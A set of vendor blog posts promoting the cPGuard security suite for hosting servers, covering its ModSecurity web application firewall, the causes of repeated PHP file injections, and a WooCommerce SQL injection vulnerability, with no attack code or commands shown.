DirectAdmin ModSecurity Web Application Firewall – DirectAdmin WAF 

DirectAdmin ModSecurity Web Application Firewall – DirectAdmin WAF 

What is Web Application Firewall ( WAF )?

A web application firewall (WAF) is a security layer that can work with your web server or in front of your web server that monitors and filters incoming traffic to the web application. The duty of the WAF is to block malicious traffic, and bots while allowing legitimate traffic through. With a proper WAF, you may eliminate most of the web security threats against your websites or web applications and can avoid compromised websites on your server.

Importance for Web Application Firewall in DirectAdmin

The actual duty of WAF is to secure websites/web applications from web attacks and malicious access. On a DirectAdmin server where people normally host multiple websites, thus a security layer like WAF is essential because there must be multiple types/versions of web applications and frameworks installed on the same server. On many such servers, the installed Web Applications may contain known or unknown vulnerabilities which are the key for hackers to gain access to the website or the user account. With a proper Web Application Firewall, we can stop most of such website vulnerability scanners, general web attack attempts, and website compromise, and eventually helps to reduce server load/overhead and save server admin time. It is easy to enable and manage cPGuard WAF on  a DirectAdmin server we provide complete support for the integration and log management.

cPGuard WAF

The cPGuard WAF is powered by Malware.Expert Commercial ModSecurity rules set and tuned for shared hosting servers. It is written from scratch based on the real-world analysis of websites for over 10 years and can block most generic and targeted attacks. It can block most of the generic  attacks against Web Server and PHP, broken out into the following attack categories:

  • SQL injection
  • Cross-site Scripting (XSS)
  • Local File Include
  • Remote File Include
  • File upload vulnerabilities
  • Zero-Day attacks
  • Web shells executions
  • Captcha verification

It also has optimized application-specific Mod_Security rules, covering the same vulnerability classes for applications such as:

  • WordPress
  • Joomla
  • Drupal etc

How cPGuard WAF can help to block web attacks and reduce server load?

The cPGuard WAF has various rules set, which you can enable optionally based on your preference. The rules together can stop bad bot access, completely stop WordPress login page/ xmlrpc.php attacks using the unique captcha system, and block generic attacks.

For example, you may not need to worry about SQL injection attacks after enabling cPGuard WAF. This is a major issue, especially for WordPress plugins where such vulnerabilities are reported quite often ( recent examples are CVE-2023-23488, CVE-2023-23489, and CVE-2023-23490 ). You can be worry-free and do not need to follow it and force the users to patch them to avoid a compromised website.

How to enable cPGuard WAF?

To install and enable cPGuard WAF, you may need to purchase and install cPGuad first on your server. After installing cPGuard on your server, you may refer to this help article and enable WAF on your server. It is easy to enable – disable WAF with a few clicks. You also have the flexibility to enable/disable selective WAF rules set for specific types of attacks. You can view the WAF logs from App Portal and each user can view the web attacks against their websites from their user plugin available in DirectAdmin.

Conclusion

The cPGuard WAF is the cost-effective and efficient WAF and Security Plugin available now for your DirectAdmin server. It is compatible with all web servers supported in DirectAdmin and enables seamless integration with them. The cPGuard WAF can automate malware scans, web attack mitigation, and distributed attacks, and can help to reduce server load and total time to manage servers. We have 30 days free trial using which you can try the solution without payment…it is also the cheapest security suite even after the trial period. 

cPanel ModSecurity Web Application Firewall – cPanel WAF

cPanel ModSecurity Web Application Firewall – cPanel WAF

What is Web Application Firewall ( WAF )?

A web application firewall (WAF) is a security layer that can work with your web server or in front of your web server that monitors and filters incoming traffic to the web application. The duty of the WAF is to block malicious traffic, and bots while allowing legitimate traffic through. With a proper WAF, you may eliminate most of the web security threats against your websites or web applications and can avoid compromised websites on your server. 

Web Application Firewall for cPanel 

As mentioned above, the actual duty of WAF is to secure websites and web applications from web attacks and malicious access. On a cPanel server where people normally host multiple websites, a security layer like WAF is essential because there must be multiple web applications and frameworks installed on the same server. On such servers, the installed Web Applications may contain known or unknown vulnerabilities which are the key for hackers to gain access to the website or the user account. With a proper Web Application Firewall, we can stop most of such website vulnerability scanners, general web attack attempts, and website compromise and eventually helps to reduce server load/overhead and save server admin time

cPGuard WAF

The cPGuard WAF is powered by Malware.Expert Commercial ModSecurity rules set and tuned for shared hosting servers. It is written from scratch based on the real-world analysis of websites for over 10 years and can block most generic and targeted attacks. It can block most of the generic  attacks against Web Server and PHP, broken out into the following attack categories:

SQL injection
Cross-site Scripting (XSS)
Local File Include
Remote File Include
File upload vulnerabilities
Zero-Day attacks
Web shells executions
Captcha verification

It also has optimized application-specific Mod_Security rules, covering the same vulnerability classes for applications such as:

WordPress
Joomla
Drupal
etc

 

How cPGuard WAF can help to block web attacks and reduce server load?

The cPGuard WAF has various rules set, which you can enable optionally based on your preference. The rules together can stop bad bot access, completely stop WordPress login page/ xmlrpc.php attacks using the unique captcha system, and block generic attacks.

For example, you may not need to worry about SQL injection attacks after enabling cPGuard WAF. This is a major issue, especially for WordPress plugins where such vulnerabilities are reported quite often ( recent examples are CVE-2023-23488, CVE-2023-23489, and CVE-2023-23490 ). You can be worry-free and do not need to follow it and force the users to patch them to avoid a compromised website. 

How to enable cPGuard WAF?

To install and enable cPGuard WAF, you may need to purchase and install cPGuad first on your server. After installing cPGuard on your server, you may refer to this help article and enable WAF on your server. It is easy to enable – disable WAF with a few clicks. You can also view the WAF logs from App Portal and each user can view the web attacks against their websites from their user plugin available in cPanel.

 

Conclusion 

The cPGuard WAF is the cost-effective and efficient WAF and Security Plugin available now for your cPanel server. It can automate malware scans, web attack mitigation, and distributed attacks, and can help to reduce server load and total time to manage servers. We have 30 days free trial using which you can try the solution without payment…it is also the cheapest security suite even after the trial period. 

Secure websites in Webmin/Virtualmin, Webmin antivirus/antimalware

Secure websites in Webmin/Virtualmin, Webmin antivirus/antimalware

Secure Webmin/Virtualmin Hosting

Nowadays it is very challenging to keep the websites on your server safe and secure. You can always expect an attack or attempt to compromise your website by attackers, especially towards popular CMS like WordPress. So it is laborious for every web host or server owner to keep updated and defend against such attacks and keep your websites safe.

How cPGuard can help you to secure websites on your Webmin/Virtualmin server?

All the modules in the cPGuard Security Suite work side by side to protect your websites from attacks. It secures your server in various layers, blocks invasion attempts, reduces server load and overhead, and helps to drastically reduce your admin hours dealing with attacks and compromised websites. Given below are some of the cPGuard modules that protect your server

  1. File Scanner – This module will act as an antivirus/antimalware for websites hosted in Webmin/Virtualmin. Integrated with its cleanup module, this will help to detect and wipe malicious file uploads and injections to your websites
  2. Web Application Firewall – cPGuards ModSecurity Web Application Firewall rules will stop all generic web attacks against your websites before they even begin. The commercial WAF rules by Malware.Expert protects your Webmin/Virtualmin client websites by effectively blocking generic web attacks, specific web attacks, and bot attacks and more.
  3. Distributed system firewall – The IPDB distributed system firewall for Webmin/Virtualmin can block traffic from known and active source IPs. This firewall for Webmin/Virtualmin is very much effective to block many attacks even before they reach your application server and thereby reduce your server overhead as well.
  4. Reputation monitoring – The reputation monitoring module will help to keep an eye on the status of your IP address and domains and alert you if they are listed on blacklists.

There are many other functionalities integrated within cPGuard to help you run your server securely and cleanly. Please read more about the features list at https://opsshield.com/standalone.html

If you wish to secure your Webmin/Virtualmin server, please follow the installation instructions. Installation is pretty simple and we have pre-built templates to support Webmin/Virtualmin servers.

Given below is cPGuard installation sample steps on  a Webmin/Virtualmin server.

Repeated PHP File Injections

Repeated PHP File Injections

Injecting bad code into a legitimate file or inserting a bad file into an application folder is a very common type of virus attack. But there are some specific cases where repeated file injection happens to the same file or folder. In such cases even if the scanner detects and take action against the detected instance, it may happen again and causes a scanner log flood. In this blog, we are discussing some common reasons that can cause such issues based on the cases that we handled in the past.

1. Cron Jobs

This is a very common type of cause for repeated file injections and is easy to find. In this scenario, the user account is compromised and the attacker is taking advantage of it to install malicious cron jobs to repeatedly inject files into the account.

Given below is an active campaign specifically targeting to cPanel account, where the compromised cPanel accounts through some campaign are being abused with similar cron jobs for the past couple of weeks.

There can be other types of cron jobs as well, which will download the file from a remote location and execute it. This will run as a daemon on the server which will monitor and upload/update malicious code into the account.

2. Process or Daemon run under the user account

This type of abuse is also common and a bit more aggressive than the scheduled cron-based injections. As it is a running process, it actively tracks any change to the targeted infected file or location and adds infection if it cannot find the bad code in it. This type of abuse is easy to find because the bad process keeps running and consumes resources. You can easily track such jobs by listing the processes owned by the affected user using “ps” command. Few such examples are given below…

cPGuard has a process monitoring module integrated, which will peridiocally scan the processes running under the user accounts, take action and report them if  matches to any of the known abuse patterns.

3. Using hidden code in nulled third-party modules

This is another method and is difficult to find because it needs source code verification of all files within the account. This often happens with nulled WordPress plugins/themes which the users often install to save some money. But such packages will cause more damage and can ultimately turn your website not unable and vulnerable. You need to go through each files or use  a malware scanner like cPGuard to find such hidden malicious code. An example for such case is given below, which will run every time you access th website and include malcious code into the index.php file

Conclusion

The reason for repeated file infection is not just limited to this but can happen due to other reasons as well. But these are the most common reason behind repeated infections and cPGuard is being trained to handle many such cases already. But ultilamtely it is required to find the security hole using which the hacker got access to the account and patch it. Otherwise the attacker can come back any time and repeat the action.

SQL Injection Vulnerability Discovered in WooCommerce – Generic SQL Injection Attacks

SQL Injection Vulnerability Discovered in WooCommerce – Generic SQL Injection Attacks

On 15th July 2021, a critical SQL-injection security vulnerability in the WooCommerce e-commerce platform and a related plugin was reported which might affect millions of websites around the world. The vulnerabilities were detected on the 13th of July and fixed in WooCommerce versions 3.3.6 to 5.5.1 and WooCommerce Blocks versions 2.5.16 to 5.5.1. Though they pushed a forced automatic update to all affected websites, it is recommended to manually check your website and make sure that everything is up to date.

What is the exploit impact? As per the announcement from WooCommerce, this vulnerability allows an unauthenticated attacker to access arbitrary data in an online store’s database. If a store was affected, the exposed information will be specific to what that site is storing but could include order, customer, and administrative information

So what is an SQL Injection attack and how to prevent it? SQL injection is a web security vulnerability that allows an attacker to interfere with the SQL queries that an application makes to its database. This type of vulnerability allows a malicious hacker to affect the database in a way that makes it display information or behave differently in ways it’s not supposed to. This is a common attack vector and can be mostly detected using some website auditing tools. The developer of every application must do proper validation of the user input through any form or from the URI and filter them properly.

Can cPGuard protect your website from such vulnerabilities? Yes, the cPGuard WAF is powered by Malware.Expert ModSec rules set can protect your websites from such generic attacks including SQL injection. So cPGuard can already defend against such attacks and protect your websites. It also works along with the IPDB Distributed  Firewall module which can detect and block the repeated attacking IPs on all our customer servers.